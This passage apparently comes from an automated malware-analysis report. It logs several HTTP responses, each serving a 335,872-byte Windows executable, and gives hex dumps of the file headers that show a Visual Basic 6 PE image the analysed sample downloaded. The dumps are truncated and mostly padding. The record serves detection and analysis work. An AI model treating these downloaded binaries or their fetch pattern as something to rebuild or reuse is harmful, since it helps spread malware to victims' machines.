00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:52 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:52 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:58 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:53:22 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:53:23 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:53:26 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:53:37 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 